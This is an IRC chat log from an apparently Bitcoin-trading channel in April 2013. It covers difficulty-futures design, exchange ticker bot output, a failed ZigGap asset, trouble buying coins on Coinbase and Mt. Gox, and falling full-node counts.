ThickAsThieves you still haven't solidified your idea into something we can discuss tho. Apr 01 18:03:02 what if you play devils advocate Apr 01 18:03:07 and do better than me Apr 01 18:03:27 ya, see, this doesn't work as an approach. i mean it's prolly fine in middle school or w/e, but i'm not 14. Apr 01 18:03:41 that matters? Apr 01 18:03:46 this isnt school Apr 01 18:03:54 well yes, it does. if i had a better way i'd be doing it. Apr 01 18:03:59 what did you think ? Apr 01 18:04:02 just a customer urging for evolution of your features and offers Apr 01 18:04:24 so you are saying there is absolutely no room for improvement? Apr 01 18:04:28 that's fine, but it seems to me like a case of "you should improve your exchange so everybody makes money on all trades" Apr 01 18:04:36 nah Apr 01 18:04:40 it's a nice sentiment, but fundamentally unworkable. Apr 01 18:04:43 so they are desirable at all Apr 01 18:04:53 i wanna be able to lose money and make moneyt Apr 01 18:04:54 ThickAsThieves what concrete improvement you desire? Apr 01 18:04:56 rather than just lose money Apr 01 18:05:04 yeah, specify something i can follow. Apr 01 18:05:24 like I said concretely "publish last settlement values". Apr 01 18:05:35 [BTCTC] [BASIC-MINING] 2 @ 0.38 = 0.76 BTC [+] Apr 01 18:05:40 add a factor for volatility from one settlement to the next? Apr 01 18:06:04 then you dont need outside data Apr 01 18:06:10 but can stay more dynamic Apr 01 18:06:15 what's the 2.9x ? Apr 01 18:06:29 arbitrary? Apr 01 18:06:40 yes, but is it a factor for volatility from one settlement to the next. Apr 01 18:06:55 use two settlements as data points Apr 01 18:06:59 or 3 even Apr 01 18:07:04 why ? Apr 01 18:07:14 to make your factor dynamic Apr 01 18:07:23 i mean i could use all 4 (barring the fact that currenlty we only have 1 anyway) Apr 01 18:07:44 and that may be a good idea, but won't really be worth discussing for about another year Apr 01 18:07:54 ThickAsThieves, that ould make sense only if there was some discernible trend Apr 01 18:08:11 jurov i think his presumption is that diff can not go down Apr 01 18:08:21 no Apr 01 18:08:22 this is liable to be correct for as long as mining is still immature obviously. Apr 01 18:08:38 i want a formula that is more representative of trend Apr 01 18:08:40 ;;asks 115 Apr 01 18:08:57 There are currently 11527.345 bitcoins offered at or under 115.0 USD, worth 1246988.35026 USD in total. | Data vintage: 0.0010 seconds Apr 01 18:08:58 last settlement is not enough Apr 01 18:09:14 ;;ticker Apr 01 18:09:20 ThickAsThieves, go make one yourself. you'll be rich Apr 01 18:09:23 BTCUSD ticker | Best bid: 100.10001, Best ask: 101.00000, Bid-ask spread: 0.89999, Last trade: 100.10001, 24 hour volume: 65241.37945590, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 97.05058 Apr 01 18:09:27 my precious Apr 01 18:09:29 what if you settled every diff change? Apr 01 18:09:50 that'd be incredibly short term Apr 01 18:09:54 ;;goxlag Apr 01 18:09:58 i'd need ~30 or so items in a year Apr 01 18:10:00 0 seconds Apr 01 18:10:02 but you'd have many more options forward Apr 01 18:10:04 hmm back under 100? :) Apr 01 18:10:06 not to mention we don't even know how many exactly. Apr 01 18:10:11 ;;ticker Apr 01 18:10:21 [BTCTC] [ASICMINER-PT] 8 @ 0.74996 = 5.9997 BTC [-] Apr 01 18:10:27 [BTCTC] [ASICMINER-PT] 1 @ 0.74997 BTC [+] Apr 01 18:10:30 [BTCTC] [ASICMINER-PT] 26 @ 0.74998 = 19.4995 BTC [+] Apr 01 18:10:31 BTCUSD ticker | Best bid: 100.01000, Best ask: 100.99900, Bid-ask spread: 0.98900, Last trade: 100.99900, 24 hour volume: 66370.06016972, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 97.11111 Apr 01 18:11:38 if yo arent willing to use outside data, arent willing to settle more often, arent willing to make factor more dynamic, then that rules out my current ideas but one Apr 01 18:11:46 just making them entrely custom Apr 01 18:11:55 [MPEX] [S.MPOE] 8800 @ 0.00060388 = 5.3141 BTC [+] Apr 01 18:11:57 [MPEX] [S.MPOE] 21700 @ 0.00060609 = 13.1522 BTC [+] Apr 01 18:11:58 [MPEX] [S.MPOE] 1000 @ 0.00060809 = 0.6081 BTC [+] Apr 01 18:12:17 write it for sale at any price, but you must be able to cover a minimum % on top iof it Apr 01 18:12:25 disclose both Apr 01 18:12:30 then let buyer decide Apr 01 18:12:36 ThickAsThieves: other exchanges would probably welcome your completely customized futures Apr 01 18:13:02 well yours already work fine Apr 01 18:13:33 oh shit Apr 01 18:13:34 but even i don't offer such customizability "cover up to whatever you want" Apr 01 18:13:42 that would be a mess Apr 01 18:13:46 i wake up to nyancat and the joker on bitcoinity Apr 01 18:14:05 you could limit the parameters of what was custom Apr 01 18:14:05 smickles: hey hey Apr 01 18:14:08 see my om Apr 01 18:14:10 om Apr 01 18:14:12 kk Apr 01 18:14:15 like increments or such Apr 01 18:14:18 pm* Apr 01 18:14:24 doesnt have to be total free for all Apr 01 18:14:59 i'd then have to list multiple securities, with different collaterals Apr 01 18:15:02 anyway, all that aside, the idiff futures are largely an experimental asset, so Apr 01 18:15:18 two with fixed one are enough Apr 01 18:15:54 so, we finally broke 100….anyone win any bets on that one? Apr 01 18:16:01 in the end i'm just asking for a way to spend more on mpex :) Apr 01 18:16:09 lol Apr 01 18:16:22 so give it to me baby Apr 01 18:16:30 splnkr probably. Apr 01 18:16:34 make it more like satoshidice, you say Apr 01 18:16:50 not exactly Apr 01 18:16:59 https://bitcointalk.org/index.php?topic=163260.0 Apr 01 18:17:02 but there is certainly a betting platform idea in there somewhere Apr 01 18:17:02 this is something else Apr 01 18:17:33 oh... it's nyanslug for the lag Apr 01 18:18:26 ;;ticker Apr 01 18:18:32 BTCUSD ticker | Best bid: 100.50000, Best ask: 100.90000, Bid-ask spread: 0.40000, Last trade: 100.90000, 24 hour volume: 66370.06016972, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 97.11111 Apr 01 18:19:12 lol: Apr 01 18:19:13 11:16] [ZigGap] 1500000.0 @ 0.00000152 = 2.28000000 [-] Apr 01 18:19:14 [11:16] [ZigGap] 3000000.0 @ 0.00000151 = 4.53000000 [-] Apr 01 18:19:14 [11:16] [ZigGap] 190000.0 @ 0.00000150 = 0.28500000 [-] Apr 01 18:19:29 that hurts Apr 01 18:20:01 zipgap? Apr 01 18:20:44 they are on BF Apr 01 18:20:46 is this the dead asset deprived was discussing ? Apr 01 18:21:05 yes Apr 01 18:21:08 i never invested or even heard of that Apr 01 18:21:11 ipo was at .0005 Apr 01 18:21:13 [MPEX] [O.USD.P080T] 5 @ 0.0753858 = 0.3769 BTC Apr 01 18:21:14 ziggap is down for maint. be back soon Apr 01 18:21:15 oops Apr 01 18:21:19 oops Apr 01 18:21:19 .00005 Apr 01 18:21:26 .005 damn Apr 01 18:21:40 better but still not fun Apr 01 18:21:42 http://finance.yahoo.com/q?s=TSLA Apr 01 18:21:43 second round was at .0001 Apr 01 18:21:45 was it a scam? Apr 01 18:21:48 all sold out Apr 01 18:21:52 yes of course it was a scam Apr 01 18:21:54 <_aeon> https://b1tm3.wordpress.com/2013/04/01/a-visit-to-mt-gox/ Apr 01 18:21:56 Bugpowdurr your habit of logging in and then dropping makes you lose out. Apr 01 18:22:11 <_aeon> First we need to get everything stabilized with licensing and we are considering creating entities around the world with the correct licensing, which is a lot of work. Sometimes it’s less work, e.g. in Europe where you get a license for one country it’s valid within the EU, but in the US you need to get a license from every single state. It means you need an office in every single state, you need to discuss with every single state Apr 01 18:22:11 <_aeon> conditions, there are a lot of differences between them… It’s a nightmare. That’s one reason why we want Coinlab to do it for us: it’s too much work.” Apr 01 18:22:15 Apr 01 15:15:32 ;;later tell bugpowder : here's an idea : make hashing processors out of dragonfly brains. Apr 01 18:22:19 I do feel like a loser Apr 01 18:22:49 Bugpowdurr: all your predictions jave come true Apr 01 18:22:51 ;;ticker Apr 01 18:22:56 _aeon are you related to ziggap ? Apr 01 18:22:56 you are the oracle Apr 01 18:22:57 BTCUSD ticker | Best bid: 99.75000, Best ask: 100.50000, Bid-ask spread: 0.75000, Last trade: 100.50000, 24 hour volume: 66370.06016972, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 97.11111 Apr 01 18:22:59 https://bitcointalk.org/index.php?topic=146611.msg1715159#msg1715159 Apr 01 18:23:06 guide us o wise one Apr 01 18:23:08 <_aeon> no affiliations Apr 01 18:23:11 a ok. Apr 01 18:23:15 ziggap is plummeting Apr 01 18:23:18 buy calls Apr 01 18:23:49 " you need to discuss with every single state" ya dood, i'm sure every single state is discussing shit with every single bootstrapped project. Apr 01 18:24:24 also for the record : mtgox failed to get registered in europe, got kicked out of france, Apr 01 18:24:33 are currently using some eastern european banks which allows them to skirt it. Apr 01 18:24:35 i can buy calls with the 45btc i just made on ltc Apr 01 18:24:36 Re: ziggap, aethero said 3 days ago in -otc that his HDD crashed Apr 01 18:24:41 hasn't been online since Apr 01 18:24:46 course their usual lieing sort of bs suggests they do have eu licenses. Apr 01 18:24:47 [MPEX] [S.DICE] 450 @ 0.004 = 1.8 BTC [+] Apr 01 18:25:10 Scrat a my bad, brain confused aeon/aethero Apr 01 18:25:28 [MPEX] [S.MPOE] 20000 @ 0.0006 = 12 BTC [-] Apr 01 18:25:34 ;;seen #bitcoin-otc aethero Apr 01 18:25:34 aethero was last seen in #bitcoin-otc 2 days, 20 hours, 14 minutes, and 15 seconds ago: bubble popped Apr 01 18:25:54 damn, ziggap.com down again Apr 01 18:26:17 buy puts on ziggap! Apr 01 18:26:24 "Obama Proclaims April the Month to Teach Young People ‘How to Budget Responsibly’" Apr 01 18:26:28 best april fool's ever. Apr 01 18:26:32 ;;ticker Apr 01 18:26:39 BTCUSD ticker | Best bid: 99.95348, Best ask: 99.98345, Bid-ask spread: 0.02997, Last trade: 99.95348, 24 hour volume: 67981.72491317, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 97.21329 Apr 01 18:26:48 [BTCTC] [S.DICE-PT] 9 @ 0.00479 = 0.0431 BTC [-] Apr 01 18:27:10 well Apr 01 18:27:16 that was fun while it lasted Apr 01 18:27:35 what if today is the top Apr 01 18:27:40 how sad a thought Apr 01 18:27:41 obviously it was going to get kicked back as soon as it went over 100 Apr 01 18:27:53 Bugpowdurr the puts covered earlier so dunno about that. Apr 01 18:28:32 everytime I have a sad thought like that I imagine being in position 8500 in the gox verification queue, then I get a little happier Apr 01 18:29:40 ;;bids 90 Apr 01 18:29:43 lol Apr 01 18:29:43 There are currently 25109.349 bitcoins demanded at or over 90.0 USD, worth 2313401.22003 USD in total. | Data vintage: 76.7031 seconds Apr 01 18:30:05 wow Apr 01 18:30:34 ;;nethash Apr 01 18:30:39 62054.1218082 Apr 01 18:30:42 nice Apr 01 18:30:50 ;;estimate Apr 01 18:30:56 Next difficulty estimate | 7667060.77584 based on data since last change | 8668728.39687 based on data for last three days Apr 01 18:31:32 can't believe how cheap those idiff futures are! :) Apr 01 18:40:15 http://www.youtube.com/watch?v=crXK49f9kQg Apr 01 18:41:29 [MPEX] [S.DICE] 918 @ 0.00380051 = 3.4889 BTC [-] Apr 01 18:41:32 [MPEX] [S.DICE] 1800 @ 0.00374009 = 6.7322 BTC [-] Apr 01 18:41:33 [MPEX] [S.DICE] 2000 @ 0.0037005 = 7.401 BTC [-] Apr 01 18:43:08 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Apr 01 18:45:01 $unconfirmed Apr 01 18:45:04 smickles: 557 Apr 01 18:48:48 WTS G.SDICE,GSDPT,G.MPOE,G.BBET, BTCQuick and TU.Silver shares! Apr 01 18:50:36 so DICE is just dead? Apr 01 18:50:52 people can't sell it fast enough Apr 01 18:50:56 well Apr 01 18:51:06 gotta get capital to buy calls dude Apr 01 18:51:32 Nah DICE is not dead Apr 01 18:51:37 just having a bad month Apr 01 18:51:48 i was sure it would bounce back a bit at the the of the month but no luck Apr 01 18:52:17 Dice still profited over 100,000k USD, on a bad month Apr 01 18:52:28 and ppl still dump Apr 01 18:52:46 well,people can not see past tomorrow Apr 01 18:52:54 but w\e Apr 01 18:53:01 [HAVELOCK] [VTX] 1 @ 0.53 BTC [-] Apr 01 18:53:16 i thought most ppl in the this game were better than that and i don't know squat Apr 01 18:53:40 I will ride it for another month see what happens Apr 01 18:53:43 [BTCTC] [ASICMINER-PT] 1 @ 0.74998 BTC [+] Apr 01 18:53:46 any body have any clues/ideas on the further development that EV was hinting about ? Apr 01 18:54:17 he has been talking new interface for 2 months Apr 01 18:55:00 Troic nope. Apr 01 18:55:01 [HAVELOCK] [VTX] 3 @ 0.481 = 1.443 BTC [-] Apr 01 18:55:02 I would imagine it has to do with return bet amounts and compression/reducing bloat Apr 01 18:55:03 '(and this will be more relevant due to other developments we have in mind...).' is suppose 'in mind' is not in the works Apr 01 18:55:39 Bugpowdurr: there is more too the calc for the number of puts than just strike/spot ! Apr 01 18:56:00 [HAVELOCK] [VTX] 51 @ 0.48 = 24.48 BTC [-] Apr 01 18:56:18 and you have to remember, for every seller of SDICE- there is a buyer on the other side Apr 01 19:09:01 again, no love for MP http://www.theverge.com/2013/4/1/4154500/mt-gox-barons-of-bitcoin Apr 01 19:09:17 i tried emailing them for you MP, I did! Apr 01 19:10:55 almost had an interview set up for ya, but they said your diff futures made no sense and lol'd me away Apr 01 19:11:17 ;) Apr 01 19:13:11 ThickAsThieves yeah, i care deeply about the knitting circle. Apr 01 19:14:00 ThickAsThieves> $avgpc << $avg Apr 01 19:14:09 Is coinbase down for purchasing coins right now? Apr 01 19:14:12 oh, i see now you figured itout Apr 01 19:16:55 Anyone having trouble with coinbase? Apr 01 19:17:58 coinbase is fucked. Apr 01 19:18:14 move your coins ASAP and find another avenue for purchase/sell Apr 01 19:18:27 Any recommendations ? Apr 01 19:18:46 Starcraft two tournament with Bitcoin prize pool starts in 42 Minutes. Apr 01 19:18:46 Join us at sc2btc.com :D Apr 01 19:19:10 I'll defer to others on that microhxo.. I haven't bought in a while. Try getting verified on btcquick.com Apr 01 19:19:25 [BTCTC] [ASICMINER-PT] 6 @ 0.74 = 4.44 BTC [-] Apr 01 19:19:30 MP I have interview with CNN Online for you. Apr 01 19:19:36 I know you hate them. Apr 01 19:20:28 dont use gox... Apr 01 19:20:47 smickles, i just searched for the last time you made the command :) Apr 01 19:21:14 microhxo where are you based ? Apr 01 19:21:26 USA Apr 01 19:21:36 Bugpowdurr: being a bio man, I would think you would program elaborate trading bots... Apr 01 19:21:45 mp, i was only joking on that link because while you dont care about the knitting circle, you are indeed looking for press nonetheless right? Apr 01 19:21:46 coinbase worked fine for me, was quick too but my friend wants to buy some and it says they dont have any more coins atm. Apr 01 19:22:00 coinbase never has enough coins Apr 01 19:22:02 whats wrong with gox? Apr 01 19:22:15 they only buy based on user demand Apr 01 19:22:19 that way they never lose money Apr 01 19:22:27 It seems like ALL sites have no coins right now. Apr 01 19:22:49 even btcquick is sold out... Apr 01 19:23:17 there will be another buy spree Apr 01 19:23:24 DeaDTerra: liquid is involved in it? Apr 01 19:23:28 when the companies buy coins Apr 01 19:23:33 or just one of their players? Apr 01 19:23:35 So for USA Apr 01 19:23:41 what is the goto site to buy bitcoins? Apr 01 19:23:45 campbx Apr 01 19:23:52 ThickAsThieves sure. Apr 01 19:24:04 thestringpuller: I have a MATLAB based mpex bot Apr 01 19:24:12 but, not using right now Apr 01 19:24:12 That's sexy. Apr 01 19:24:20 microhxo USA is a little iffy, might want to give otc a try tho Apr 01 19:24:31 Take dat girl and parallelize her in CUDA Apr 01 19:24:40 otc? Apr 01 19:24:41 Bugpowdurr: ever seen libjacket? Apr 01 19:24:44 The 10% of capital in calls and the rest in cold storage plan is working well. Apr 01 19:24:53 nah I am not a real programmer Apr 01 19:24:56 only matlab Apr 01 19:25:44 ;;bids 0 Apr 01 19:25:51 There are currently 51593462 bitcoins demanded at or over 0.0 USD, worth 10104543.0415 USD in total. | Data vintage: 0.0097 seconds Apr 01 19:25:58 whoa Apr 01 19:25:59 yeah boyeee Apr 01 19:26:02 1.01 Apr 01 19:26:05 10.1 Apr 01 19:26:13 microhxo yes, otc stands for over the counter. there's this system of trading btc with other parties, based on the wot Apr 01 19:26:17 (web of trust) Apr 01 19:26:29 it has a number of advantages but takes a little work. Apr 01 19:26:29 sounds risky.. Apr 01 19:26:35 110 could be in play today Apr 01 19:26:39 it may be, at least to begin with. Apr 01 19:27:02 Also I can only pay with paypal on that. No way am i giving bank acct info out. And i know no one wants to accept paypal because its reversible. Apr 01 19:27:14 a yes. Apr 01 19:27:18 mtgox takes pp ?! Apr 01 19:27:27 Dont believe so Apr 01 19:27:33 o i see what you mean. Apr 01 19:27:42 microhxo: manage your risk. You will always have risk with BTC (or USD) Apr 01 19:27:43 yeah, in the us you're probably stuck with mtgox Apr 01 19:27:50 as a retail buyer Apr 01 19:27:53 yea Apr 01 19:28:14 localbitcoins is great if you are in a major metro area Apr 01 19:28:18 or that yea Apr 01 19:28:28 meet some hawt chick in a restaurant Apr 01 19:28:28 or keep hammering coinbase, they have a rolling 24 hr limit which could reset at any moment. You can check them hourly and try to buy... but that is just lame. Apr 01 19:28:35 (if localbitcoins had any clue they'd do that) Apr 01 19:30:51 There are currently 51593462 bitcoins demanded <- More bitcoins are demanded than will ever exist, thus circulation? Apr 01 19:31:00 [HAVELOCK] [VTX] 17 @ 0.584885 = 9.943 BTC [+] Apr 01 19:31:52 5mn ? Apr 01 19:32:03 that's 51m Apr 01 19:32:15 yup Apr 01 19:32:19 a ok Apr 01 19:32:24 51mn bitcoins are currently demanded. Apr 01 19:32:33 So the price has to go up... Apr 01 19:32:39 that are just buyers expectations Apr 01 19:32:41 well im guessing some of the bids won't get filled. Apr 01 19:33:00 [HAVELOCK] [SDICE] 5 @ 0.4 = 2 BTC [+] Apr 01 19:33:02 [HAVELOCK] [SDICE] 2 @ 0.3962 = 0.7924 BTC [-] Apr 01 19:33:03 [HAVELOCK] [SDICE] 3 @ 0.396 = 1.188 BTC [-] Apr 01 19:33:04 sure Apr 01 19:33:06 some won't buy if it doesn't come down to $2... Apr 01 19:33:07 the number of bitcoins demanded is irrelevant Apr 01 19:33:11 i demand that many bitcoins for .00001 USD Apr 01 19:33:20 the total $ demanded is Apr 01 19:33:22 Bugpowdurr: how so? Apr 01 19:33:29 oh total $ demanded Apr 01 19:33:42 just focus on the total $ demanded. That represents actual funded bids on gox. Apr 01 19:33:48 microhxo look into dwolla Apr 01 19:33:50 Bugpowdurr wait. Apr 01 19:33:52 highest I have seen is $10.4MM Apr 01 19:33:58 o nm Apr 01 19:34:08 [BTCTC] [S.MPOE-PT] 1 @ 0.000645 BTC [+] Apr 01 19:34:14 Thanks, ill check em out Apr 01 19:34:17 do you still have any S.DICE? Apr 01 19:34:21 or did you empty out Apr 01 19:34:24 microhxo it can be slow to get money in but people love it Apr 01 19:34:33 ;;nethash Apr 01 19:34:39 62669.1151321 Apr 01 19:34:48 How long from start to finish to buy a bitcoin? Apr 01 19:34:51 pending is fine but Apr 01 19:34:56 as long as he can get in today Apr 01 19:35:12 I'll sell him some Apr 01 19:35:18 [BTCTC] [ASICMINER-PT] 81 @ 0.74 = 59.94 BTC [-] Apr 01 19:35:21 but I will only take moneypaks Apr 01 19:35:24 [BTCTC] [ASICMINER-PT] 8 @ 0.74998 = 5.9998 BTC [+] Apr 01 19:35:28 [BTCTC] [ASICMINER-PT] 10 @ 0.74999 = 7.4999 BTC [+] Apr 01 19:35:31 [BTCTC] [ASICMINER-PT] 3 @ 0.749999 = 2.25 BTC [+] Apr 01 19:35:35 [BTCTC] [ASICMINER-PT] 77 @ 0.75 = 57.75 BTC [+] Apr 01 19:35:38 microhxo: is that doable? Apr 01 19:35:39 [BTCTC] [ASICMINER-PT] 10 @ 0.75 = 7.5 BTC [+] Apr 01 19:35:55 microhxo coinbase takes about a month or some shit. Apr 01 19:35:55 He just got 1 bitcoin on coinbase lol Apr 01 19:35:59 so he is "in the game" Apr 01 19:36:10 okay so he doesn't need coin no more? Apr 01 19:36:14 microhxo don't fuck with coinbase Apr 01 19:36:30 they're not grownups. Apr 01 19:36:32 15:13.32 ( KRS1 ) wtf yes sell all btc asap < trolling the ltc king Apr 01 19:36:38 well, im already .5 btc into coin base so once I get that I can transfer to another service. Apr 01 19:36:47 took 3 hours to get my friends coins out of there Apr 01 19:36:49 just seemed the most convenient Apr 01 19:36:51 NOT pro. Apr 01 19:36:52 yeah Apr 01 19:36:58 coinbase is n00bbase Apr 01 19:36:59 the triangle is trust, speed, price Apr 01 19:37:01 pick 2 Apr 01 19:37:05 microhxo: do you need coin? Apr 01 19:37:06 mircea_popescu: what were you saying localbitcoins should do? Apr 01 19:37:17 mtgox has all 3 if you are already verified Apr 01 19:37:21 benkay not really. if you're on otc it's pretty much max trust insta speed best price. Apr 01 19:37:40 TomServo they should hire a dozen strippers in the main towns at 100 an hour or whatever Apr 01 19:37:43 thestringpuller: Not right now. Im only testing bitcoins. Dont want to put a lot in yet. Apr 01 19:37:47 thanks though. Apr 01 19:37:49 havwe them go to sell ? buy btc Apr 01 19:37:50 mtgox i heard was slow? Apr 01 19:38:05 microhxo: I just don't want anyone who needs coin to have to miss out on trades because services are down Apr 01 19:38:10 only if you are new Apr 01 19:38:17 mircea_popescu: i never see advertisements for less than 7% above mkt Apr 01 19:38:21 [BTCTC] [ASICMINER-PT] 10 @ 0.76 = 7.6 BTC [+] Apr 01 19:38:31 I sell for 3% over market on localbitcoins Apr 01 19:38:31 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [+] Apr 01 19:38:39 thestringpuller: yea i hear you. Apr 01 19:38:49 [BTCTC] [ASICMINER-PT] 29 @ 0.76 = 22.04 BTC [+] Apr 01 19:39:09 3% over market yesterday, is 10% under market today Apr 01 19:39:09 [BTCTC] [ASICMINER-PT] 7 @ 0.76 = 5.32 BTC [+] Apr 01 19:39:17 Bugpowdurr: what's the interest level like? Apr 01 19:39:27 oh wow Apr 01 19:39:40 Bitcoin might start supporting a legit economy soon at these prices... Apr 01 19:39:49 high Apr 01 19:40:09 I think I get most of the business in my area Apr 01 19:40:17 have had 3 different buyers Apr 01 19:40:20 one is a regular Apr 01 19:40:26 I suspect he is dealing coins at school Apr 01 19:40:54 sometimes kids dealed drugs Apr 01 19:40:56 now they deal coins Apr 01 19:40:59 and get drugs of SR Apr 01 19:41:01 works. Apr 01 19:41:07 better system. Apr 01 19:41:20 Bugpowdurr: do your ads reference your OTC info? Apr 01 19:41:29 yes Apr 01 19:42:09 Bugpowdurr: I suspect he is dealing coins at school << so he is dealing them for drugs? Apr 01 19:42:33 I don't think so, I think he is just trying to make a profit Apr 01 19:42:41 probably can sell for 20% over market Apr 01 19:42:49 plus the rising price Apr 01 19:42:55 yeah, brcause of all the "protective" regulation Apr 01 19:42:57 kids cant' get btc. Apr 01 19:43:17 [MPEX] [S.MPOE] 4350 @ 0.0006 = 2.61 BTC [-] Apr 01 19:43:19 mircea_popescu: fo realz? Apr 01 19:43:30 that sounds like a good business right there, btc for children Apr 01 19:43:34 btc kids meals Apr 01 19:43:35 well how ? they get registered with mtgox ? Apr 01 19:43:45 mircea_popescu: Bitinstant Apr 01 19:43:53 violates copa Apr 01 19:43:54 a that's a thought. Apr 01 19:44:03 or Ziggap Apr 01 19:44:06 Or why not OTC Apr 01 19:44:17 danieldaniel bought coins from me by buying me hitman Apr 01 19:44:27 'merican companies can't collect information on kids Apr 01 19:44:28 as smickles could attest to Apr 01 19:44:50 surprised this made it onto the Verge, looks like they're becoming btc fans... http://www.theverge.com/2013/3/31/4168542/listen-to-bitcoin-in-real-time Apr 01 19:44:51 so they just don't do business with them, often times Apr 01 19:44:55 i would think kids would have an easier time with "no regulation" if they came into bitcoin wealth Apr 01 19:45:02 they don't have to legally pay taxes non? Apr 01 19:45:10 that is if they are enrolled Apr 01 19:45:19 thestringpuller: they do have to pay taxes Apr 01 19:45:26 via parents Apr 01 19:45:31 but you get it all refunded Apr 01 19:45:34 non? Apr 01 19:45:45 only if you don't make much Apr 01 19:45:55 same tax rates apply Apr 01 19:46:07 18 year olds usually don't have much gross income though Apr 01 19:46:08 Hmm. I guess kids may have it harder after all... Apr 01 19:46:20 if your under age kids make money, it's your income Apr 01 19:46:32 https://pbs.twimg.com/media/BGx8EptCYAAgj5K.jpg:large Apr 01 19:46:36 pic related. Apr 01 19:46:43 That's not how it worked for me when I was 17 Apr 01 19:47:18 Bugpowdurr: i learned personal income tax in 2009, so it may have been different Apr 01 19:48:17 iirc if you are claimed as a dependent, you cannot take your personal exemption, but your income is still taxed as your own income. But there may be multiple ways to skin that cat. Apr 01 19:48:26 17 you are a adult in the US, pretty sure Apr 01 19:48:42 ah no Apr 01 19:48:44 18 Apr 01 19:49:03 well, taxes not 100% sure- you can be tried as a adult at 17 Apr 01 19:49:19 default is tried as a juviy at 18 Apr 01 19:49:36 if you did something very bad they can roll you up to adult for criminal prosecution Apr 01 19:50:21 I don't think we are gonna see $110 today. Apr 01 19:54:42 http://www.youtube.com/watch?v=oozQe2Bk2cA Apr 01 19:57:49 [MPEX] [S.DICE] 1000 @ 0.0038 = 3.8 BTC [+] Apr 01 19:57:51 [MPEX] [S.DICE] 1000 @ 0.0038 = 3.8 BTC [+] Apr 01 19:57:52 [MPEX] [S.DICE] 3000 @ 0.00371 = 11.13 BTC [-] Apr 01 20:03:24 hmm only 500 nodes connected today? Apr 01 20:06:33 !help Apr 01 20:06:34 List of commands: Apr 01 20:06:35 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Apr 01 20:06:36 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Apr 01 20:06:37 !mp (desc: returns the response from MPEX order) Apr 01 20:06:38 !rules (desc: chan guidelines) {short: !r} Apr 01 20:06:39 !exchanges (desc: lists exchanges and brokers) {short: !e} Apr 01 20:06:43 !ticker btct cognitive Apr 01 20:06:46 [BTCT:COGNITIVE] 1D: 0.157 / 0.23616 / 0.2899 (59 shares, 13.9 BTC), 7D: 0.108 / 0.14794 / 0.2899 (414 shares, 61.2 BTC), 30D: 0.1012 / 0.17401 / 0.3 (930 shares, 161.8 BTC) Apr 01 20:08:20 [BTCTC] [S.MPOE-PT] 83 @ 0.000611 = 0.0507 BTC [-] Apr 01 20:11:54 mod6 kinda concerning, yes. Apr 01 20:13:12 seems like too round a number Apr 01 20:13:54 ;;ticker Apr 01 20:14:03 BTCUSD ticker | Best bid: 102.21741, Best ask: 102.54042, Bid-ask spread: 0.32301, Last trade: 102.21740, 24 hour volume: 79604.66694827, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 98.01342 Apr 01 20:14:06 at the rate nodes have been decreasing (60k two years ago, 30k a year ago, 10k recently, <1k by now) Apr 01 20:14:15 it seems this is rapidly becoming bitcoin's chief point of failure. Apr 01 20:14:29 blockchain to big Apr 01 20:14:31 too Apr 01 20:14:58 yes but as we get into the hundreds we're markedly less decentralised than visa. Apr 01 20:15:00 i run ~5 full nodes myself Apr 01 20:15:07 4 here Apr 01 20:15:10 bitcoind ? Apr 01 20:15:13 yes Apr 01 20:15:15 yes Apr 01 20:15:16 what vers ? Apr 01 20:15:19 .81 Apr 01 20:15:23 (if you don't mund my curioisuty( Apr 01 20:15:25 0.7 - 0.8 Apr 01 20:15:34 .81 is very fast compared Apr 01 20:15:40 to .7x Apr 01 20:15:44 aha Apr 01 20:15:56 from what I understand it will use all cores Apr 01 20:15:59 ya but avg folks need a week to sync Apr 01 20:16:04 or something Apr 01 20:16:05 true Apr 01 20:16:13 which is death Apr 01 20:16:13 ridiculous. even on .81 ?! Apr 01 20:16:22 well, .81 it goes much faster Apr 01 20:16:29 yea esp if not running 24/7 Apr 01 20:16:42 I keep multiple copies, so I don't know anymore Apr 01 20:16:54 but last time it took 2 dayd Apr 01 20:16:59 so 2% of active nodes is you two. Apr 01 20:17:00 i know people have been using electrun and such Apr 01 20:17:03 scary shit. Apr 01 20:17:07 lol, I guess so Apr 01 20:17:09 that uses one server side bitcoind Apr 01 20:17:22 and ppl connect to that Apr 01 20:17:35 I have about 200 connections on those 4 Apr 01 20:18:02 [MPEX] [S.MPOE] 16384 @ 0.00060656 = 9.9379 BTC [+] Apr 01 20:18:09 [MPEX] [S.MPOE] 2616 @ 0.00060809 = 1.5908 BTC [+] Apr 01 20:18:27 fucking hell. Apr 01 20:18:39 so my very expensive 15800 hdd just went Apr 01 20:18:41 retjhweriughieh Apr 01 20:18:43 and is now dead ;/ Apr 01 20:18:54 uh? Apr 01 20:18:55 :o Apr 01 20:18:55 WHO HERE DID IT Apr 01 20:19:11 you shouldnt have downloaded my cupcakes Apr 01 20:19:12 I just don't believe that there are only 500 nodes Apr 01 20:19:39 [BTCTC] [BASIC-MINING] 4 @ 0.38 = 1.52 BTC [+] Apr 01 20:19:50 ;/ Apr 01 20:20:06 well, people that did not upgrade to .81 or change the locks - I am guessing will no longer show up on nodes Apr 01 20:20:06 that's just blockchain. they might now limit to 500 Apr 01 20:20:12 yeah Apr 01 20:20:19 that's what I bet is going on Apr 01 20:20:43 smickles now that's a theory. Apr 01 20:20:52 jborkl there'd be no way to knopw as a peer Apr 01 20:21:01 ouch; https://bitcointalk.org/index.php?topic=146611.120;topicseen Apr 01 20:21:08 another round. Apr 01 20:22:25 this stupid people and money parting is taking too long! Apr 01 20:22:29 [MPEX] [S.DICE] 850 @ 0.00398999 = 3.3915 BTC [+] Apr 01 20:22:49 who reports 500 nodes? blockchain.info? Apr 01 20:23:10 kakobrekla werd brotyher. Apr 01 20:23:10 yup Apr 01 20:23:18 497, but I know a few wekks ago it was 1900 Apr 01 20:23:44 two months ago it was like 8-9000 Apr 01 20:23:52 "Once again, I get scammed." Apr 01 20:23:56 cuz i have 90 connections now and none of them is blockchain.info (it sees my txs as arriving from around the world) Apr 01 20:24:13 so think it's wildly inaccurate Apr 01 